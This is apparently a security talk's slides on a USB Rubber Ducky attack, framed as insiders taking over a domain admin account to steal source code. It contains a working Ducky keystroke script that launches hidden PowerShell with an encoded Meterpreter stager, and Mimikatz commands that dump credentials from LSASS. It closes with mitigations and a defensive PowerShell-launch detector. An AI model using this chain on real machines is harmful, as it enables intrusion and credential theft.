duck hunter - the return of autorun

10/02/2014
Nimrod Levy, Information security consultant
Duck Hunter: The return of autorun
Uploaded by nimrod-levy, posted 07-Aug-2015


$ WHOAMI

• Information Security consultant at 2Bsecure@Matrix
• Certified OSCP (Offensive Security Certified Professional)
• Security tools personally developed: AutoBrowser 3.0, Subdomain Analyzer, PyWeakServices tool
• 1st place at the Israel Cyber Challenge, 2014 (the Symantec™ Cyber Readiness Challenge, hosted during the CyberTech event)

The mission

We are employees of the “Fakesoft” company and we are very disappointed by the way the administration is behaving. We think that we can develop the software by ourselves and make a fortune. We need to find a way to take over a "Domain Admin" user account, use that account to get access to the backup server, and copy the source code of the software.

Obstacles

• Antivirus software is installed and running on end-user stations.
• No internet access.
• Segmentation with a central firewall.
• Use of all removable storage is denied from the stations.

Programmable HID USB Keyboard

USB Rubber Ducky:

The USB Rubber Ducky is a smart device which can emulate a keyboard or a mouse when connected to a computer and execute pre-programmed instructions.

Programmable HID USB Keyboard

Examples of attack vector scenarios:

• Add users to the system
• Deploy and run programs
• Upload local files
• Download and install apps
• Go to a website that the victim has cookies for, and perform a CSRF attack.

Attack process

60 seconds: Idea → Write → Encode → Load → Deploy

Scenario code

REM wait for the host to enumerate the keyboard
DELAY 3000
REM open the Start menu and search for cmd
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
REM context menu on the result; "a" selects Run as administrator
MENU
DELAY 400
STRING a
DELAY 700
REM answer the elevation prompt
LEFTARROW
DELAY 400
ENTER
DELAY 800
ENTER
ENTER
REM hidden, non-interactive PowerShell running the encoded stager (-enc, plain hyphen)
STRING powershell -nop -wind hidden -noni -enc METERPRETER ENCRYPTED AND ENCODED PAYLOAD
ENTER

What do we need?

Meterpreter payload stager:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.

What do we need?

Mimikatz:

Mimikatz is a post-exploitation tool written by Benjamin Delpy (gentilkiwi).

The Mimikatz functionality we can use dumps the logon sessions held in LSASS memory and obtains clear-text credentials of the user accounts that have connected to this machine.

Post-exploitation scenario

Command                                            Explanation
getsystem                                          Attempt to elevate your privileges to local SYSTEM.
load mimikatz                                      Load the mimikatz extension.
mimikatz_command -f sekurlsa::logonPasswords full  Run a custom mimikatz command; this module extracts passwords held in LSASS memory.
background                                         Background the current session.

Result

Now we have taken control of a domain admin account that is not linked directly to us. What can we do?

• Copy the source code we initially wanted.
• Delete or manipulate sensitive organizational data.
• Full control of user account management.
• Install malicious applications using the GPO.

Mitigation

• Define a whitelist for authorized devices.
• Increase awareness of social engineering among the employees.
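A detection a defender can build from the scenario's own launcher command line, added here as an example and not part of the original slides: score Windows process-creation events (Security event 4688 with command-line logging enabled) for powershell.exe started with the abbreviated switches the script types, and decode the -enc argument for triage. The event records, the weights and the alert threshold are constructed assumptions for this example.

```python
# Added example (not from the slides): triage 4688 events for the Ducky launcher.
import base64

# powershell.exe accepts any unambiguous prefix of a parameter name, which is why
# -nop -wind -noni -enc work; -e and -ec are documented aliases, not prefixes.
LONG_FLAGS = ["NoProfile", "WindowStyle", "NonInteractive", "EncodedCommand"]
FLAG_ALIASES = {"e": "EncodedCommand", "ec": "EncodedCommand"}
FLAG_WEIGHTS = {"NoProfile": 1, "NonInteractive": 1, "EncodedCommand": 2}
ALERT_THRESHOLD = 4  # assumed for this example; tune against your own baseline

def resolve_flag(token):
    """Map an abbreviated switch such as -noni to its full parameter name."""
    name = token.lstrip("-/").lower()
    if name in FLAG_ALIASES:
        return FLAG_ALIASES[name]
    hits = [f for f in LONG_FLAGS if f.lower().startswith(name)]
    return hits[0] if len(hits) == 1 else None

def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE script text in base64; None if invalid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return (score, decoded_command_or_None) for one process-creation event."""
    exe = event.get("NewProcessName", "").lower()
    if not exe.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, None
    tokens = event.get("CommandLine", "").split()
    flags = {}  # full parameter name -> the token that follows it
    for i, tok in enumerate(tokens[1:], start=1):
        name = resolve_flag(tok) if tok.startswith(("-", "/")) else None
        if name:
            flags[name] = tokens[i + 1] if i + 1 < len(tokens) else ""
    score = sum(w for name, w in FLAG_WEIGHTS.items() if name in flags)
    if flags.get("WindowStyle", "").lower() == "hidden":
        score += 2  # a hidden window is the strongest single indicator here
    enc = flags.get("EncodedCommand")
    return score, decode_encoded_command(enc) if enc else None

# Constructed records: a scheduled script, and the slides' launcher carrying a
# harmless encoded command in place of the Meterpreter stager.
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_B64 = base64.b64encode("Write-Output 'demo'".encode("utf-16-le")).decode()
EVENTS = [
    {"NewProcessName": PS_EXE, "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    {"NewProcessName": PS_EXE, "CommandLine": f"powershell -nop -wind hidden -noni -enc {SAMPLE_B64}"},
]
```

An event whose score reaches ALERT_THRESHOLD is worth a look regardless of the user context, because the Ducky scenario runs as whoever is logged in at the keyboard.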

Questions

[email protected]